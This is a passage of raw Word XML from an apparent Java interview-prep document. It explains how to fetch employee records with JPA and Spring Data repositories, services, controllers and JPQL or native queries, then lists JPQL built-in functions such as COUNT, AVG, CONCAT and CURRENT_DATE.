        <w:t xml:space="preserve">If I want to retrieve a few entries from an </w:t>
      </w:r>
      <w:r w:rsidR="00AC5794" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table, how to retrieve employee details through JPA</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="570"/>
    </w:p>
    <w:p w14:paraId="511C8123" w14:textId="56D6E434" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="0033099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employee details from an employee table using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you can follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92F6F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Define the Entity Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19CEC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need an entity class that represents the Employee table. This class will be annotated with JPA annotations such as @Entity, @Table, and @Id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F839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Entity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307E7A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Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514F140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Table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C08EB6" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="332FB6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86A096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 Replace "employee" with your actual table name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F81F0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7CAD1C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ADF1D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3C79DA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   // Primary key field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C55D7B" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A00F5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E79B7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department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E723E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salary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCB2D57" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5097216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0E901C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5F5D9D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Create a Repository Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B360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provides a way to interact with the database via a repository. You can extend JpaRepository or CrudRepository from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to perform CRUD operations on the Employee entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638ED18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JpaRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A4951" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAB97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3E4778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ustom query methods can be defined here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC9EB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For example, retrieving employees by department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D30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ByDepartment(String department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1352C86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DDFA4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e the Repository in a Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D7ECE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your service class, you can use the EmployeeRepository to retrieve the employee data from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA85C1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0EE0E59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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D3F35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322C5B7B" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ABE3A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rvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDAF34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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3894A" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A6B2F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202BF0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Repository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC822C" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ADAB8B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employees by department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ECF91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String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151C61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Department(department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE4115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47A023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7B38F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ll employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9DE90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B01813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All();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C611F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0AAF590" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599B52D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 specific employee by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C56D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Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0F42D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Id(id).orElse(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178372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8D4BD0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465B57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Calling the Service in a Controller (Optional, if using Spring MVC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEFD8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expose the service to a controller for a RESTful API or other purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857FF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52F8445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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1963D704" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263C7A8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7934C70F" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C571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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A4E59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estMapping("/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56096D7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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B90EE6" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507D6E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7713D26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Service employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7CA93E" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F757CE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all employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79465BE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B41660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6F490D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AllEmployees();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F65173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4397386" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B11B8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employees by department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EEDB2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department/{department}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635AE0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PathVariable String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3061A83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sByDepartment(department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7E48C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BAC020" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7769708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Endpoint to get an employee by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230FC4C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id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFC4A4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PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBA4CA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ById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491C5C3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0B96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7A26677"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Using JPQL for Custom Queries (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C41B7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f you need to perform more complex queries, you can us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Java Persistence Query Language) in the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D56A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to retrieve employees with a salary greater than a specific value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5662181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0C41FE06" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABAE85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F7072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7ED2B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salary &gt; :salary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B316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Param("salary") double salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC315A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322B4B0"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Using Native SQL Queries (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A71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case you need to use a native SQL query, you can annotate your repository method with @Query and set nativeQuery = true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569790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2A542169" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789291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29DB8232" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651E7D5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value = "SELECT * FROM employee WHERE salary &gt; ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBAA5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double salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C74C2D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66365A9"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Call the Repository Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3FB6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 you can call these methods from your service to fetch the employee data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4FB9C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in Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5695EF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List&lt;Employee&gt; getEmployeesWithHighSalary(double salary) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511A07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EmployeesWithSalaryGreaterThan(salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA6AED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B8EC3F4"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F002A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462" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C42859" w14:textId="34A3709D" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="002A0B1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="571" w:name="_Toc197867785"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain a built-in function in JPA</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="571"/>
    </w:p>
    <w:p w14:paraId="104BD79B" w14:textId="08D95430" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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7F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>built-in functions</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B087C"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COUNT() – Count the number of results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA1593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UNT() function is used to count the number of records or entities that match a given criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE830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UNT(e) FROM Employee e WHERE e.department = :department")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B2EC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ng countEmployeesByDepartment(@Param("department") String department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028EDC3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MAX() – Get the maximum value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA211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AX() function retrieves the maximum value of a field, typically a numeric or date field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D80837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AX(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1640279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axSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B06D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MIN() – Get the minimum value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11828183"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IN() function retrieves the minimum value of a field, such as the minimum salary or date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AF27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IN(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18885A3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inSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F9ACB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lastRenderedPageBreak/>
        <w:t>4. AVG() – Get the average value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2265012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AVG() function calculates the average value of a numeric field (e.g., average salary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E98F2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AVG(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7626AE0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AverageSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF25F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SUM() – Get the sum of a numeric field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25909CC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M() function adds up the values of a numeric field (e.g., total salary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC01B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M(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E39DD5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TotalSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEDE82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CONCAT() – Concatenate strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEF7F2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NCAT() function is used to concatenate two or more string fields together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ECC47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NCAT(e.firstName, ' ', e.lastName) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313AF5C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ullNames();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF2E11A"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SUBSTRING() – Extract part of a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B2832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BSTRING() function is used to extract a substring from a string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405F424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BSTRING(e.name, 1, 3) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F15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irstThreeCharactersOfNames();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A83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8. LENGTH() – Get the length of a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A8B3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LENGTH() function returns the length of a string field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123CABF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LENGTH(e.name) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E899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Integer&gt; findNameLengths();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29110B5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9. TRIM() – Trim whitespace from a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC1BB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TRIM() function is used to remove leading and trailing spaces from a string field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0D8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TRIM(e.name) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739D8C5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TrimmedNames();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1DDE16"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0. COALESCE() – Return the first non-null value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADDF531"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ALESCE() function returns the first non-null value from a list of arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101434B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ALESCE(e.middleName, 'No Middle Name') FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72380BA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MiddleNameOrDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22F89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1. NULLIF() – Return null if two expressions are equal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A71E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NULLIF() function returns NULL if the two expressions are equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214C10D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NULLIF(e.salary, 0) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2FE1F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Double&gt; findNonZeroSalaries();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFCF8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2. CURRENT_DATE() – Get the current date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD02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DATE() function returns the current date, typically used for date comparisons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B01A0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startDate = CURRENT_DATE")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE4390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WithTodayStartDate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C358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3. CURRENT_TIME() – Get the current time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4F600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 function returns the current time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1323C56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Time &lt; CURRENT_TIME")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E591C7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LastUpdatedBeforeCurrentTime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5856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4. CURRENT_TIMESTAMP() – Get the current date and time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB17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STAMP() function retrieves the current timestamp (both date and time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B06A1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 &lt; CURRENT_TIMESTAMP")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E31E2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UpdatedBeforeCurrentTimestamp();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C083BD9" w14:textId="77777777" w:rsidR="00C2152E"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104A4">
          <v:rect id="_x0000_i2463" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ECB578"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Using Built-in Functions in JPA with Spring Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA9AE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72166A3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repository.CrudRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F66E77" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F8B00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CrudRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27852255" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3982D60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COUNT(e) FROM Employee e WHERE e.department = :department")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5A42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ong countEmployeesByDepartment(String department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B82445" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3354271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AVG(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C3D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AverageSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D5A0C" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F45F9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MAX(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205016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MaxSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6513671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66D0A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hireDate = CURRENT_DATE")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67601ED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HiredToday();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8CEFF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2DE648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38C305F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4482E931" w14:textId="6844C6DD"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A7B7D9">
          <v:rect id="_x0000_i2464" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D1318" w14:textId="3D898288" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="003E54BC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="572" w:name="_Toc197867786"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is lazy loading in hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
